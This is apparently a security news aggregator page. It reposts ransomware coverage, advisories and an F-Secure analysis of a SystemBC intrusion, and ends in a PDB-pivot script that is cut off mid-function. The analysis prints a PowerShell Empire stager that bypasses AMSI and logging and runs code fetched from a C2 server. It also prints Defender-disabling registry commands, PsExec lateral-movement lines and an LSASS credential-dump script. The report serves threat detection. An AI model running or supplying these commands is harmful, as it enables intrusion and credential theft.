Malware Devil

Monday, May 10, 2021

Never say never! Warren Buffett caught up in integer overflow error…

640Kbytes of RAM should be enough for anyone…

The post Never say never! Warren Buffett caught up in integer overflow error… appeared first on Malware Devil.

https://malwaredevil.com/2021/05/10/never-say-never-warren-buffett-caught-up-in-integer-overflow-error/?utm_source=rss&utm_medium=rss&utm_campaign=never-say-never-warren-buffett-caught-up-in-integer-overflow-error

AirTags & Threat Models, Qualcomm Modem Vuln, Exim RCE(s), & Binary Hardening – ASW #150

This Week in the AppSec News, Mike and John talk: “Find My threat model” with AirTags, Qualcomm modem vuln hits lots of Android, an Exim update patches lots of vulns, measuring hardened binaries, a maturity model for k8s, & more!

Visit https://www.securityweekly.com/asw for all the latest episodes!

Show Notes: https://securityweekly.com/asw150

https://malwaredevil.com/2021/05/10/airtags-threat-models-qualcomm-modem-vuln-exim-rces-binary-hardening-asw-150-2/?utm_source=rss&utm_medium=rss&utm_campaign=airtags-threat-models-qualcomm-modem-vuln-exim-rces-binary-hardening-asw-150-2

Delivering On the Promise of Application Security – Ankur Shah – ASW #150

While the vision for app security is relatively clear, executing on that vision is still somewhat of a work in progress. Fast-moving, interdependent pieces—custom code and open source packages, infrastructure and network configurations, user entitlements—make for complex systems. In this episode, we discuss the challenge in addressing each piece independently and consider how consolidated, multi-purpose tools may present an emerging solution.

This segment is sponsored by Prisma Cloud/ Palo Alto Networks.

Visit https://securityweekly.com/prismacloud to learn more about them!

Visit https://www.securityweekly.com/asw for all the latest episodes!

Show Notes: https://securityweekly.com/asw150

https://malwaredevil.com/2021/05/10/delivering-on-the-promise-of-application-security-ankur-shah-asw-150/?utm_source=rss&utm_medium=rss&utm_campaign=delivering-on-the-promise-of-application-security-ankur-shah-asw-150

Inside the DarkSide Ransomware Attack on Colonial Pipeline

On May 8, the Colonial Pipeline Company announced that it had fallen victim to a ransomware attack a day earlier. The pipeline operations include transporting 100 million gallons of fuel daily to meet the needs of consumers across the entire eastern seaboard of the U.S. from Texas to New York, according to the website of the refined products pipeline company.

The post Inside the DarkSide Ransomware Attack on Colonial Pipeline appeared first on Security Boulevard.

https://malwaredevil.com/2021/05/10/inside-the-darkside-ransomware-attack-on-colonial-pipeline/?utm_source=rss&utm_medium=rss&utm_campaign=inside-the-darkside-ransomware-attack-on-colonial-pipeline

ShiftLeft @ RSA

Hunt bugs, detect malware, and win some snacks!

Are you going to the RSA conference coming up on May 17th to 20th? If so, come join us in talks, workshops, and our developer challenge! Here’s what we are up to at RSA and RSA DevOpsConnect.

Photo by Adam Solomon on Unsplash

Bug Hunting Workshop

Look out for a hands-on lab with me and Suchakra, where we will discuss how code can be represented in a graph, which can then be queried interactively to find bugs. We will show you how to use the open-source tool Joern to hunt for vulnerabilities using interactive static analysis: https://www.rsaconference.com/Library/presentation/USA/2021/findings-stranger-things-in-code.

Time: 3:25 PM to 5:00 PM (EDT), May 20th, 2021.

Malware Detection Talk

Chetan Conikee, CTO at ShiftLeft, will be presenting on how to detect malware and insider attacks in your source code. Insider threats are one of today’s most challenging cybersecurity issues. They are also one of the most challenging attack models to deal with in practice and not well addressed by popular security solutions.

In this talk, Chetan will walk through a live forensic code auditing exercise of the Solorigate supply chain insider attack: SUNBURST, SUPERNOVA, and SUNSPOT. He will also discuss malware detection techniques for the early phases of the software development lifecycle (SDLC).

Time: 6:30 PM to 7:00 PM (EDT), May 20th, 2021.

How to develop with both speed and security?

Finally, Kit Wetzler and Prabhu Subramanian will be presenting on how developing fast and developing securely don't have to be at odds.

The demand for engineering security into applications and for automating vulnerability discovery increases with our fast-paced development environment today. The ability to statically identify vulnerabilities comprehensively, efficiently, and with few false positives is an important primitive to achieve. In this presentation, Kit and Prabhu will show you how this can be achieved.

Time: 2:45 PM to 3:00 PM (EDT), May 20th, 2021.

Challenge yourself, and win some prizes!

Finally, we will be hosting a booth at the conference (Booth link TBD) on May 19th, where we will be holding a developer security challenge. Stop by our booth to test your skills! Anyone who answers correctly will be entered into a raffle for three SnackMagic boxes!

See you there! Developer-first from the start, ShiftLeft is the code security platform developers love. Powered by our unique Code Property Graph (CPG) technology, the ShiftLeft CORE platform combines static analysis, secrets detection, intelligent SCA, and security education in one easy-to-use solution. Visit our site to find out more.

Thanks for reading! What is the most challenging part of developing secure software for you? I’d love to know. Feel free to connect on Twitter @vickieli7.

ShiftLeft @ RSA was originally published in ShiftLeft Blog on Medium, where people are continuing the conversation by highlighting and responding to this story.

The post ShiftLeft @ RSA appeared first on Security Boulevard.

https://malwaredevil.com/2021/05/10/shiftleft-rsa/?utm_source=rss&utm_medium=rss&utm_campaign=shiftleft-rsa

Ransomware Cyber Attack Forced the Largest U.S. Fuel Pipeline to Shut Down

Colonial Pipeline, which carries 45% of the fuel consumed on the U.S. East Coast, on Saturday said it halted operations due to a ransomware attack, once again demonstrating how infrastructure is vulnerable to cyber attacks.

“On May 7, the Colonial Pipeline Company learned it was the victim of a cybersecurity attack,” the company said in a statement posted on its website. “We have since determined that this incident involves ransomware. In response, we proactively took certain systems offline to contain the threat, which has temporarily halted all pipeline operations, and affected some of our IT systems.”

Colonial Pipeline is the largest refined products pipeline in the U.S., a 5,500 mile (8,851 km) system involved in transporting over 100 million gallons from the Texas city of Houston to New York Harbor.

Cybersecurity firm FireEye’s Mandiant incident response division is said to be assisting with the investigation, according to reports from Bloomberg and The Wall Street Journal, with the attack linked to a ransomware strain called DarkSide.

“We are engaged with Colonial and our interagency partners regarding the situation,” the U.S. Cybersecurity and Infrastructure Security Agency (CISA) said. “This underscores the threat that ransomware poses to organizations regardless of size or sector. We encourage every organization to take action to strengthen their cybersecurity posture to reduce their exposure to these types of threats.”

Darkside ransom note

An analysis of the ransomware published by Cybereason earlier in April 2021 reveals that DarkSide has a pattern of being used against targets in English-speaking countries, while avoiding entities located in former Soviet Bloc nations.

The operators behind the ransomware also recently switched to an affiliate program in March, wherein threat actors are recruited to spread the malware by breaching corporate network victims, while the core developers take charge of maintaining the malware and payment infrastructure.

DarkSide, which commenced operations in August 2020, has published stolen data from more than 40 victims to date. It’s not immediately clear how much money the attackers demanded or whether Colonial Pipeline has paid. A separate report from Bloomberg alleged that the cybercriminals behind the attack stole 100GB of data from its network.

Rising Threat of Ransomware

The latest cyber attack comes as a coalition of government and tech firms in the private sector, called the Ransomware Task Force, released a list of 48 recommendations to detect and disrupt the rising ransomware threat, in addition to helping organizations prepare and respond to such attacks more effectively.

Potentially damaging intrusions targeting utilities and critical infrastructure have witnessed a surge in recent years, fueled in part by ransomware attacks that have increasingly jumped on the double extortion bandwagon to not only encrypt the victim’s data, but exfiltrate the information beforehand and threaten to make it public if the ransom demand is not paid.

Based on data gathered by Check Point and shared with The Hacker News, cyber attacks targeting American utilities increased by 50% on average per week, from 171 at the start of March to 260 towards the end of April. What’s more, over the last nine months, the monthly number of ransomware attacks in the U.S. nearly tripled to 300.

“Furthermore, in recent weeks an average of 1 in every 88 Utilities organization in the U.S. suffered from an attempted Ransomware attack, up by 34% compared to the average from the beginning of 2021,” the American-Israeli cybersecurity firm said.

In February 2020, CISA issued an alert warning of increasing ransomware infections impacting pipeline operations following an attack that hit an unnamed natural gas compression facility in the country, causing the company to shut down its pipeline asset for about two days.

Securing pipeline infrastructure has been an area of focus for the Department of Homeland Security, which in 2018 assigned CISA to oversee what’s called the Pipeline Cybersecurity Initiative (PCI) that aims to identify and address emerging threats and implement security measures to protect more than 2.7 million miles of pipelines responsible for transporting oil and natural gas in the U.S.

The agency’s National Risk Management Center (NRMC) has also published a Pipeline Cybersecurity Resources Library in February 2021 to “provide pipeline facilities, companies, and stakeholders with a set of free, voluntary resources to strengthen their cybersecurity posture.”

https://malwaredevil.com/2021/05/10/ransomware-cyber-attack-forced-the-largest-u-s-fuel-pipeline-to-shut-down-2/?utm_source=rss&utm_medium=rss&utm_campaign=ransomware-cyber-attack-forced-the-largest-u-s-fuel-pipeline-to-shut-down-2

This Day in History 1921: Sophie Scholl Was Born

On the 22nd of February 1943 a brave 21-year-old woman walked to a Nazi guillotine, displaying full conviction she “had done the best I could have done for my people”. This is where her life ended. But how did it begin? Today marks what would have been the 100th birthday of Sophie Scholl. On May … Continue reading This Day in History 1921: Sophie Scholl Was Born

The post This Day in History 1921: Sophie Scholl Was Born appeared first on Security Boulevard.

https://malwaredevil.com/2021/05/10/this-day-in-history-1921-sophie-scholl-was-born/?utm_source=rss&utm_medium=rss&utm_campaign=this-day-in-history-1921-sophie-scholl-was-born

Terminal escape injection in AWS CloudShell

https://malwaredevil.com/2021/05/10/terminal-escape-injection-in-aws-cloudshell/?utm_source=rss&utm_medium=rss&utm_campaign=terminal-escape-injection-in-aws-cloudshell

World Password Day, Tesla Hacking via Drone, Ipsos Screenwise Panel

Do we still need World Password Day? Hacking a Tesla via a drone, and a privacy warning about the Ipsos Screenwise panel.

** Links mentioned on the show **

World password day – May 6th: https://www.darkreading.com/vulnerabilities—threats/will-2021-mark-the-end-of-world-password-day-/a/d-id/1340911

Tesla Car Hacked Remotely From Drone via Zero-Click Exploit: https://www.securityweek.com/tesla-car-hacked-remotely-drone-zero-click-exploit

What is this Ipsos/Google Screenwise Panel? (Tom received a […]

The post World Password Day, Tesla Hacking via Drone, Ipsos Screenwise Panel appeared first on The Shared Security Show.

The post World Password Day, Tesla Hacking via Drone, Ipsos Screenwise Panel appeared first on Security Boulevard.

https://malwaredevil.com/2021/05/10/world-password-day-tesla-hacking-via-drone-ipsos-screenwise-panel/?utm_source=rss&utm_medium=rss&utm_campaign=world-password-day-tesla-hacking-via-drone-ipsos-screenwise-panel

IT Pros Prefer Best of Breed Security vs. Single Vendor Solutions

A recent Ponemon study found that 71% of IT professionals prefer to use best-of-breed security solutions rather than get all of their security tools from a single vendor. This finding is especially important in the light of recent security architectures, especially SASE and Zero Trust.

The post IT Pros Prefer Best of Breed Security vs. Single Vendor Solutions appeared first on K2io.

The post IT Pros Prefer Best of Breed Security vs. Single Vendor Solutions appeared first on Security Boulevard.

https://malwaredevil.com/2021/05/10/it-pros-prefer-best-of-breed-security-vs-single-vendor-solutions/?utm_source=rss&utm_medium=rss&utm_campaign=it-pros-prefer-best-of-breed-security-vs-single-vendor-solutions

Beyond MFA: Adding Context For Secure Access

The pandemic forced most businesses globally to transition to remote work. With many people working from home, any semblance of a corporate security perimeter evaporated, increasing demand for virtual private networks (VPNs) and multifactor authentication (MFA) to strengthen an organization’s security posture.

Legacy Multifactor Authentication Technology is Flawed

Implementing MFA is definitely the right step..

The post Beyond MFA: Adding Context For Secure Access appeared first on Security Boulevard.

https://malwaredevil.com/2021/05/10/beyond-mfa-adding-context-for-secure-access/?utm_source=rss&utm_medium=rss&utm_campaign=beyond-mfa-adding-context-for-secure-access

The Perils of a Running Start: Can You Skip SOC 2 Type 1?

We’re often asked by customers embarking on the SOC 2 journey, “Can we skip the SOC 2 Type 1 and go straight into a Type 2?” They reason that instead of paying for two audits, they would only pay for one. It seems like an easy choice, right? However, this is not a decision to..

The post The Perils of a Running Start: Can You Skip SOC 2 Type 1? appeared first on Security Boulevard.

https://malwaredevil.com/2021/05/10/the-perils-of-a-running-start-can-you-skip-soc-2-type-1/?utm_source=rss&utm_medium=rss&utm_campaign=the-perils-of-a-running-start-can-you-skip-soc-2-type-1

Four Plead Guilty to Aiding Cyber Criminals with Bulletproof Hosting

Four Eastern European nationals face 20 years in prison for Racketeer Influenced Corrupt Organization (RICO) charges after pleading guilty to providing bulletproof hosting services between 2008 and 2015, which were used by cybercriminals to distribute malware to financial entities across the U.S.

The individuals, Aleksandr Grichishkin, 34, and Andrei Skvortsov, 34, of Russia; Aleksandr Skorodumov, 33, of Lithuania; and Pavel Stassi, 30, of Estonia, have been accused of renting their wares to cybercriminal clients, who used the infrastructure to disseminate malware such as Zeus, SpyEye, Citadel, and the Blackhole Exploit Kit that were capable of co-opting victim machines into a botnet, and stealing sensitive information.

The deployment of malware caused or attempted to cause millions of dollars in losses to U.S. victims, the U.S. Department of Justice (DoJ) said in a statement on Friday.

“A key service provided by the defendants was helping their clients to evade detection by law enforcement and continue their crimes uninterrupted; the defendants did so by monitoring sites used to blocklist technical infrastructure used for crime, moving ‘flagged’ content to new infrastructure, and registering all such infrastructure under false or stolen identities,” the DoJ added.

The organization was founded by Grichishkin and Skvortsov, the latter of whom was also responsible for marketing its criminal business, while Skorodumov and Stassi acted as lead systems administrator and took charge of other administrative tasks, including using stolen personal information to register web hosting and financial accounts.

Bulletproof hosting (BPH), also known as abuse-resistant services, is different from regular web hosting in that it allows a content provider more leniency in the kind of data that can be hosted on those servers, thus making it easier to evade law enforcement. Operators of bulletproof hosting services are known to employ a variety of tricks to stay under the radar, while simultaneously acting as a safe haven with the goal of anonymizing cybercrime operations.

Last December, law enforcement agencies from the US, Germany, Netherlands, Switzerland, France, along with Europol’s European Cybercrime Centre (EC3), took down Safe-Inet, a popular virtual private network (VPN) service that was used to facilitate illicit activity.

https://malwaredevil.com/2021/05/10/four-plead-guilty-to-aiding-cyber-criminals-with-bulletproof-hosting/?utm_source=rss&utm_medium=rss&utm_campaign=four-plead-guilty-to-aiding-cyber-criminals-with-bulletproof-hosting

Security Alert: Alert Regarding Cross Site Scripting Vulnerability (CVE-2021-20717) in EC-CUBE

JPCERT-AT-2021-0022
JPCERT/CC
2021-05-10

I. Overview

On May 7, 2021, EC-CUBE CO.,LTD. released an alert regarding a cross-site scripting vulnerability (CVE-2021-20717) in EC-CUBE. By leveraging the vulnerability, a remote attacker may execute arbitrary script in the site administrator’s web browser, resulting in unauthorized access to the vulnerable site or leakage of personal information. EC-CUBE CO.,LTD. has confirmed attacks that exploit this vulnerability.

EC-CUBE 4.0.x: Alert Regarding Cross Site Scripting Vulnerability (Japanese)
https://www.ec-cube.net/info/weakness/20210507/

Since attacks that exploit the vulnerability have already been confirmed, users of the affected products are recommended to take measures such as applying patches as soon as possible. For more information, please refer to the information provided by EC-CUBE CO.,LTD. For countermeasures, please consider contacting the contractor responsible for building the site when responding to the vulnerability.

II. Affected Products and Versions

Affected products and versions are as follows.

– EC-CUBE version from 4.0.0 to 4.0.5

III. Solution

EC-CUBE CO.,LTD. has released a patch and a fixed version that address the vulnerability. Please consider applying the patch or the fixed version by referring to the information published by EC-CUBE CO.,LTD.

– EC-CUBE version 4.0.5-p1

In addition, for users who customize the original source code of EC-CUBE, the code difference and information on precautions when applying the update have been provided.

Countermeasure method 2: Manually updating by checking the difference (Japanese)
https://www.ec-cube.net/info/weakness/20210507/#diff

IV. Compromise Investigation

EC-CUBE CO.,LTD. has provided information on how to check whether an attack exploiting this vulnerability has taken place, which is done by checking the data within order and member information.

How to check the attack (Japanese)
https://www.ec-cube.net/info/weakness/20210507/#check

V. References

EC-CUBE CO.,LTD.
[Important] Request to respond to the vulnerability of “high” urgency in EC-CUBE 4.0 series (updated 2021/5/10 9:00) (2021/05/07) (Japanese)
https://www.ec-cube.net/news/detail.php?news_id=383

EC-CUBE CO.,LTD.
Released “EC-CUBE 4.0.5-p1” that addressed the vulnerability (2021/05/10) (Japanese)
https://www.ec-cube.net/news/detail.php?news_id=384

Japan Vulnerability Notes JVN#97554111
Cross Site Scripting Vulnerability in EC-CUBE (Japanese)
https://jvn.jp/jp/JVN97554111/

If you have any information regarding this alert, please contact JPCERT/CC.

JPCERT Coordination Center (Early Warning Group)
MAIL: ew-info@jpcert.or.jp
https://www.jpcert.or.jp/english/

https://malwaredevil.com/2021/05/10/security-alert-alert-regarding-cross-site-scripting-vulnerability-cve-2021-20717-in-ec-cube/?utm_source=rss&utm_medium=rss&utm_campaign=security-alert-alert-regarding-cross-site-scripting-vulnerability-cve-2021-20717-in-ec-cube

Federal Court Permits Warrantless Device Searches at Border

With the weather getting warmer, and vaccinations against COVID-19 increasing, we are likely to see an increase in travel — including international business travel. But for individuals and companies seeking to protect their data privacy, a recent ruling by the United States Court of Appeals for the First Circuit may give rise to concern about..

The post Federal Court Permits Warrantless Device Searches at Border appeared first on Security Boulevard.

https://malwaredevil.com/2021/05/10/federal-court-permits-warrantless-device-searches-at-border/?utm_source=rss&utm_medium=rss&utm_campaign=federal-court-permits-warrantless-device-searches-at-border

Prelude to Ransomware: SystemBC

Introduction

In late February 2021, F-Secure’s Managed Detection and Response (MDR) service identified the execution of SystemBC malware as part of a hands-on-keyboard crimeware intrusion. The intrusion was stopped before the threat actor could reach their objective, but recent reporting has tied the use of this malware to ransomware activity. F-Secure was also able to identify another recent intrusion by the same threat actor in which they deployed Ryuk ransomware.

F-Secure’s analysis of the SystemBC sample identified that this was a new variant of the malware, with several notable differences from previous versions. The sample was executed by a previously undocumented “wrapper”, which F-Secure’s research suggests has been used in combination with multiple malware families common in crimeware intrusions.

This blog provides insight into both the intrusion and the malware sample, so that organizations can be informed to protect themselves from this evolving threat. A detection section is included, which contains actionable takeaways so that organizations can improve their own defenses against this and similar threats.

Intrusion Technical Detail

The intrusion began in a third-party IT service provider, which had an unpatched VPN appliance that was vulnerable to remote exploitation. The threat actor was able to extract credentials from this device and then access a host with connectivity to the victim network. The threat actor entered the victim network via a Remote Desktop Protocol (RDP) connection using stolen credentials of an administrator account belonging to that third-party IT service provider.

Figure 1: Initial Access Attack Path

Once the RDP session had connected, the threat actor immediately began to enumerate the victim domain and network. From an interactive PowerShell session they used Windows utilities such as net.exe, ping.exe and nltest.exe.

C:\Windows\System32\net.exe group "enterprise admins" /domain
C:\Windows\System32\net.exe user <USER> /domain
C:\Windows\System32\net.exe group "domain admins" /domain
C:\Windows\System32\net.exe group "domain computers" /domain
C:\Windows\System32\nltest.exe /dclist: <DOMAIN>

Figure 2: Enumeration Command Lines

Shortly after this they scanned the network using a portable version of Advanced IP Scanner, a tool popular in crimeware circles. The scanner was used to sweep multiple sub-networks for normal service ports and dynamic ranges.

%USERPROFILE%\Downloads\Advanced_IP_Scanner_2.5.3850.exe

Figure 3: Advanced IP Scanner Path

The scanner was downloaded from the software provider’s website via Internet Explorer and executed with explorer.exe. F-Secure’s investigation uncovered a forensic artifact that suggests the threat actor was watching a YouTube video on how to use this tool prior to execution.

After initial reconnaissance, the adversary executed a Base64 encoded PowerShell command. The decoded command is included below.

If($PSVERsIONTabLe.PSVERSIoN.MajOR -ge 3){$GPF=[ref].ASsEMBly.GetTypE('System.Management.Automation.Utils')."GeTFIe`lD"('cachedGroupPolicySettings','N'+'onPublic,Static');IF($GPF){$GPC=$GPF.GetVALUE($nuLL);If($GPC['ScriptB'+'lockLogging']){$GPC['ScriptB'+'lockLogging']['EnableScriptB'+'lockLogging']=0;$GPC['ScriptB'+'lockLogging']['EnableScriptBlockInvocationLogging']=0}$vAl=[CoLLectIonS.GenErIc.DICTIONary[String,SYSTEm.OBJECT]]::New();$val.Add('EnableScriptB'+'lockLogging',0);$VAl.ADd('EnableScriptBlockInvocationLogging',0);$GPC['HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\PowerShell\ScriptB'+'lockLogging']=$VAl}ElSe{[SCripTBLOck]."GEtFiE`lD"('signatures','N'+'onPublic,Static').SeTVaLue($nuLL,(New-ObjecT COllEcTiONs.GenERIC.HashSET[StRINg]))}[ReF].ASSeMBly.GEtTyPE('System.Management.Automation.AmsiUtils')|?{$_}|%{$_.GEtFiELd('amsiInitFailed','NonPublic,Static').SETValue($NULL,$tRUe)};};[SySTEm.NeT.SERVIcePoINTMaNAGeR]::ExpecT100ContInue=0;$wc=NEw-OBJECt SYstEM.NeT.WEBCLIENT;$u='Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko';[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true};$Wc.HeAdeRS.AdD('User-Agent',$u);$WC.PRoXy=[System.Net.WeBRequest]::DefaULtWeBProXY;$Wc.PrOXY.CRedeNTiALS = [SysTEm.NeT.CrEDeNtIaLCAChe]::DEFAULtNEtwORKCREdENTiALs;$Script:Proxy = $wc.Proxy;$K=[System.TEXt.ENCoding]::ASCII.GEtBYTES('b3a9ff9c3041b9841a771013e1ac9f21');$R={$D,$K=$ArGs;$S=0..255;0..255|%{$J=($J+$S[$_]+$K[$_%$K.CoUNt])%256;$S[$_],$S[$J]=$S[$J],$S[$_]};$D|%{$I=($I+1)%256;$H=($H+$S[$I])%256;$S[$I],$S[$H]=$S[$H],$S[$I];$_-bXor$S[($S[$I]+$S[$H])%256]}};$ser='https://193.29.104.187/:443';$t='/news.php';$WC.HeadERs.ADd("Cookie","session=SWk+gWN3HiMjZmI/X/6tsGgRVb4=");$DatA=$WC.DowNloadData($Ser+$t);$IV=$Data[0..3];$DATa=$DATA[4..$data.LenGth];-jOIn[Char[]](& $R $DaTa ($IV+$K))|IEX

Figure 4: Decoded PowerShell Command

The command is associated with the PowerShell Empire framework and disables ScriptBlock logging and AMSI before connecting out to an external Command and Control (C2) server. The threat actor was using the default version of PowerShell Empire with the following C2 and User-Agent:

C2: https://193.29.104[.]187/news.php
User-agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko

Figure 5: PSE C2 & User Agent

After establishing C2 communication through PowerShell Empire and conducting additional reconnaissance, the actor disabled Windows Defender with multiple registry changes using reg.exe.

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v DisableAntiVirus /t REG_DWORD /d 1 /f
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v MpEnablePus /t REG_DWORD /d 0 /f
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v DisableBehaviorMonitoring /t REG_DWORD /d 1 /f
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v DisableIOAVProtection /t REG_DWORD /d 1 /f
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v DisableOnAccessProtection /t REG_DWORD /d 1 /f
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v DisableRealtimeMonitoring /t REG_DWORD /d 1 /f
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v DisableRoutinelyTakingAction /t REG_DWORD /d 1 /f
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v DisableScanOnRealtimeEnable /t REG_DWORD /d 1 /f
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v DisableEnhancedNotifications /t REG_DWORD /d 1 /f
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v DisableBlockAtFirstSeen /t REG_DWORD /d 1 /f
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v SpynetReporting /t REG_DWORD /d 0 /f
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v SubmitSamplesConsent /t REG_DWORD /d 2 /f
reg.exe delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f

Figure 6: “reg.exe” Command Lines

Immediately after Windows Defender was disabled the actor downloaded an archive from “sendspace[.]com” – an online file sharing platform.

hXXps://fs12n1.sendspace[.]com/dl/2dcbf9eb9e28920a81febd3f0a8cda84/6039c40226878d2e/px2kd3/1.rar

Figure 7: Malicious Archive URL

Once extracted from the archive, the file “Svchost.exe” (SHA256 2dc93817039e6fa4fae014e1386cffa7ac35b89feac59d8abe7f51be1c089580) was executed. F-Secure’s analysis shows this file is a new variant of the SystemBC malware family; a full analysis of the malware is included later in this post.

Figure 8: SystemBC Download

With multiple routes of access to the network established, the threat actor then downloaded another archive from the same domain containing four additional files.

hXXps://fs12n5.sendspace[.]com/dl/5593c4325c0f9c23cb59661893ae9454/6039c46105fab7d4/3dugcw/2.zip

Figure 9: Additional Malicious Archive URL

The files downloaded were stored on a share that was mapped for all hosts on the victim network.

servers0.bat
1.ps1
a.ps1
PsExec.exe

Figure 10: Archive Contents

The first file of interest, servers0.bat, was a batch file that contained a long list of commands to execute the “1.ps1” PowerShell script on multiple hosts using PsExec.exe.

start PsExec.exe -d \\<hostname> -u "<username>" -p "<pass>" -accepteula -s cmd /c "powershell.exe -ExecutionPolicy Bypass -file \\<share>\1.ps1"
start PsExec.exe -d \\<hostname> -u "<username>" -p "<pass>$" -accepteula -s cmd /c "powershell.exe -ExecutionPolicy Bypass -file \\<share>\1.ps1"
start PsExec.exe -d \\<hostname> -u "<username>" -p "<pass>$" -accepteula -s cmd /c "powershell.exe -ExecutionPolicy Bypass -file \\<share>\1.ps1"
start PsExec.exe -d \\<hostname> -u "<username>" -p "<pass>$" -accepteula -s cmd /c "powershell.exe -ExecutionPolicy Bypass -file \\<share>\1.ps1"

Figure 11: Truncated Contents of “servers0.bat”

The PowerShell script “1.ps1” attempts to create a dump of the LSASS process by using rundll32.exe to call the MiniDump export of comsvcs.dll. If successful, the threat actor would then extract any credentials held in the memory of that process offline, using tools such as Mimikatz.

$computerName = $env:computername;
$procid = Get-Process | Where-Object {$_.ProcessName -eq 'lsass'} | Select-Object Id
Powershell -c rundll32.exe C:\Windows\System32\comsvcs.dll, MiniDump $procid.Id $Env:TEMP\$computerName full
Start-Sleep -s 59
Copy-Item -Path $Env:TEMP\$computerName -Destination "\\<hostname>\<share>\$($computerName)"

Figure 12: Contents of “1.ps1”

In addition, the threat actor deployed a PowerShell script named “a.ps1” capable of further enumerating hosts across the network. Interestingly, the file still contained the hostname and domain from a previous intrusion by the group against another victim, which allowed F-Secure to notify that victim of the activity. F-Secure saw no evidence that this script was executed, despite its creation on victim systems by the threat actor.

$path = "\\<hostname>.<domain>\s$\" + $env:computername;
$OutputVariable = (cmd.exe /c tasklist /v) | Out-File -FilePath "$($path)_task.txt" -Append;
$OutputVariable = (cmd.exe /c arp -a) | Out-File -FilePath "$($path)_arp.txt" -Append;
$OutputVariable = (cmd.exe /c dir C:\users) | Out-File -FilePath "$($path)_users.txt" -Append;

Figure 13: Contents of “a.ps1”

The actor was not able to execute any further malicious commands as containment was actioned by the F-Secure MDR service and the victim organization.

“Svchost.exe” Analysis – SystemBC

File Name: svchost.exe

SHA1: f8af1b293aecdb3d1fe038b4b638f283ee852287

MD5: fa93cfe0898c704551cefdfa193d406f

SHA256: 2dc93817039e6fa4fae014e1386cffa7ac35b89feac59d8abe7f51be1c089580

Path: C:\Users\Public\svchost.exe

Execution Command Line: C:\Users\Public\svchost.exe start

Wrapper

The “svchost.exe” binary is a wrapper that contains an encrypted SystemBC payload. When the wrapper executes, it decrypts the payload and injects it into the memory of a child process. The technique used is commonly known as process hollowing.

All of the wrapper’s key APIs are resolved at runtime. After the resolution routine it creates a new process using its own command line, so the child process is started from the wrapper’s own disk image.

Figure 14: Process Command Line

The child is launched in a suspended state so that code can be injected into it before it runs. The wrapper uses NtUnmapViewOfSection to unmap the original image from the target process memory.

Figure 15: NtUnmapViewOfSection Code

0x7000 bytes of new memory are allocated in the child process with VirtualAllocEx at address 0x400000, with the protection set to PAGE_EXECUTE_READWRITE (flProtect = 0x40). The SystemBC backdoor is then decrypted and written into the new memory region with WriteProcessMemory.

Figure 16: WriteProcessMemory Code

After the code is injected, the wrapper sets the main thread context of the child to point at the payload’s entry point (0x1000) and calls ResumeThread on the child process. Process hollowing means the unpacked malicious code is only ever visible in process memory, never in the on-disk file.

Figure 17: Wrapper Execution Flow

Pivoting from the debug string found in the wrapper, “y:\test4\e93\Debug\e93.pdb”, we can see multiple other samples carrying other payloads such as Bazar Loader. The earliest observed malware sample in F-Secure’s telemetry dates back to December 2019. There were over 300 samples in total that contain a similar PDB path and appear to be the same wrapper. The table below includes a selected few examples.

PDB Path                    | Compilation Time Stamp
y:\test4\104\Debug\104.pdb  | 2019-12-15 18:02
y:\test4\a30\Debug\a30.pdb  | 2020-08-09 11:58
y:\test4\e45\Debug\e45.pdb  | 2020-09-06 17:07
y:\test4\e62\Debug\e62.pdb  | 2020-12-01 10:43
y:\test4\e88\Debug\e88.pdb  | 2021-01-11 10:19
y:\test4\e93\Debug\e93.pdb  | 2021-02-23 21:32
y:\test4\e97\Debug\e97.pdb  | 2021-03-02 17:55
y:\test4\e98\Debug\e98.pdb  | 2021-03-10 16:07
y:\test4\e98\Debug\e98.pdb  | 2021-03-13 23:22
y:\test4\e94\Debug\e94.pdb  | 2021-03-20 10:16

The PDB paths suggest a single environment is used to compile the malware. This is likely linked to a single malware developer or team. Artifacts within the binaries suggest that the author is Russian speaking, which aligns with F-Secure’s knowledge of the wider crimeware actor who conducted the intrusion.
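The pivot described above can be automated. The following Python script is an added example, not F-Secure’s tooling or code from the report: it pulls the COFF compile timestamp and the CodeView (RSDS) PDB path out of a PE file and matches the y:\test4\<id>\Debug\<id>.pdb pattern from the table, where the directory name and the PDB stem are the same identifier. The PE bytes it runs against are constructed inline (a minimal header carrying the e93 path and that row’s timestamp); they are not a real sample.

```python
"""Pivot on the wrapper's PDB path and compile timestamp.

Added example, not code from the F-Secure report.  Reads the COFF
TimeDateStamp from a PE header and the PDB path from the CodeView "RSDS"
record, then matches the y:\test4\<id>\Debug\<id>.pdb pattern from the
report's table.  The bytes at the bottom are constructed for the demo.
"""
import re
import struct
import uuid
from datetime import datetime, timezone

# Directory id and PDB stem must be the same identifier, as in every row of the table.
PDB_PATTERN = re.compile(rb"y:\\test4\\([0-9a-z]+)\\Debug\\\1\.pdb", re.IGNORECASE)


def coff_timestamp(data: bytes):
    """Return the PE TimeDateStamp as an aware UTC datetime, or None if not a PE."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        return None
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        return None
    # COFF header layout: Machine(2) NumberOfSections(2) TimeDateStamp(4) ...
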